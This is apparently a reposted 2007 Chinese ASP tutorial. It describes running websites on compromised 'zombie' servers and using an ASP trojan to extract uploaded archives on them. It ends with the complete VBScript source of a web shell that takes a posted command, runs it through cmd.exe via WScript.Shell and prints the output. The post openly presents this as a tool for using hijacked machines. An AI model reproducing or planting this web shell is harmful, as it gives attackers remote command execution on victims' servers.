文章探索:   分类:    关键字:  
  + 栏目导航
  + 相关文章
asp中有关字符编码转换的几个函数
绝妙的asp生成静态页面html函数
Asp计算页面执行时间
一个简单的用存储过程分页
将asp页面转换成htm页面
ASP网站漏洞解析及黑客入侵防范方法
URL编码与SQL注入
几种常用排序算法(asp)
ASP调用带参数存储过程的几种方式
实用的ASP连接数据库的函数
ASP如何获取真实IP地址
ASP中怎么实现SQL数据库备份、恢复
判断Cookies是否处于开启状态
怎样才能将服务器端文件夹下的文件,..
几行Asp代码实现防止表单重复提交
用ASP设计网站在线人数统计程序
asp论坛在线人数统计研究
如何用ASP远程在数据库中创建Table
用ASP调用SQL Server的视图和存储过程
Asp与XML的关系
ASP读取EXCEL
在ASP中使用Oracle数据库技巧
一个通过web.Mail发送邮件的类
几种打开记录集方式的比较
购物车范例(购物车页面 )
如何使用FSO搜索硬盘文件
GB码和BIG5码的互换技术
用ASP开发WEB日期选择器
一个投票系统的源程序(coveryourasp.c..
列出服务器上的打印机

技术教程 -> ASP教程 ->  
用ASP木马实现FTP和解压缩
来源:转载   人气:762   录入时间:2007-11-8
     我想大家都有一些开了80端口的肉鸡吧,如果是国内的出于安全就不要往下看了,如果不不妨往下看一下,小弟献丑了,以求抛砖引玉.
   
      在肉鸡上放网站最麻烦的可能就是更新和上传大量的文件了,终端服务大白天容易被发现,自己开个ftp又不放心.自己在网上转了一圈发现通过结合无组件上传和ASP木马可以轻松实现.
   
      asp木马大家都很熟悉,无非就是一个cmd,有什么作用啊,你别急,听我慢慢说嘛.整体思路就是先通过ftp,139,或者winshell上传一个无组件asp程序.我选择了化境的Webedit(其实这个已经不是一个单纯的无组件上传的工具了,通过它还可以修改,删除文件/目录,可以用来更新页面喔,作起来广告了,我跟他没亲戚啊,闪过一个flying bottle..继续)和一个asp木马(如果,实在懒得找.最后带着源码,粘贴另存为asp文件即可),记住可都要在肉鸡的web目录喔.其实大多的问题webedit都可以解决,不过如果有很多文件一个一个上传可就麻烦了,怎么办?这下asp木马用上了.找一个rar.exe(所有装过了winrar的目录都有,说不定肉鸡上已经安好了,如果是别的命令行的解压缩工具也可以喔)把它拷到%SystemRoot%\system32\下.上传.zip或者.rar文件到该肉鸡的web目录.在浏览器地址栏里打开asp木马(暂时称之为trojan.asp),在text文本框里输入rar -x source.rar path解压缩成功,V,且慢如何得到web目录的绝对路径(path)呢?我用的是用土方法,修改trojan.asp加入一行转换虚拟目录成绝对路径并输出的语句<% =server.mappath(".") %>,"."可以随意改成任何的相对虚拟目录.
   
      只是提供一个思路,如果哪个牛人可写一个asp的解压缩那更好喽,不过?谁会呢,我不会,你会吗?至于如何隐藏虚拟目录,支持简体中文显示等就不是该篇的讨论之列了,老话,安全第一,一般放个小的论坛或聊天室就可以了,如果真放个个人主页,还把自己的联系地址,电话号码也留给人家就不太好了.ps.junesun建议直接作成自解压,不知会不会弹出对话框。
   
      --------以下是asp木马的源码,建议在<html>后加上<% =server.mappath(".") %>------------------------------
   
    <%@ Language=VBScript %>
    <%
     Dim oScript
     Dim oScriptNet
     Dim oFileSys, oFile
     Dim szCMD, szTempFile
     On Error Resume Next
     <
   
      ' -- create the COM objects that we will be using -- '
      Set oScript = Server.createObject("WSCRIPT.SHELL")
      Set oScriptNet = Server.createObject("WSCRIPT.netWORK")
      Set oFileSys = Server.createObject("Scripting.FileSystemObject") <
   
      ' -- check for a command that we have posted -- '
      szCMD = Request.form(".CMD")
      If (szCMD <> "") Then <
   
       ' -- Use a poor man's pipe ... a temp file -- '
       szTempFile = "C:\" & oFileSys.GetTempName( )
       Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
       Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) <
   
      End If <
   
    %>
    <HTML>
    <BODY>
     <form action="<%= Request.ServerVariables("URL") %>" method="POST">
      <input type=text name=".CMD" size=45 value="<%= szCMD %>">
      <input type=submit value="Run">
     </form>
    <PRE> <
   
     <%
      If (IsObject(oFile)) Then
       ' -- Read the output from our command and remove the temp file -- '
       On Error Resume Next
       Response.Write Server.HTMLEncode(oFile.ReadAll)
       oFile.Close
       Call oFileSys.deleteFile(szTempFile, True)
      End If
     %>
    </BODY>
    </HTML>
    >
   
   



Copyright(C)2007-2024 广州市佳沛数码科技有限公司 版权所有
公司地址: 广州市荔湾区东漖北路560号511室
电话:020-81803473 传真:020-81544987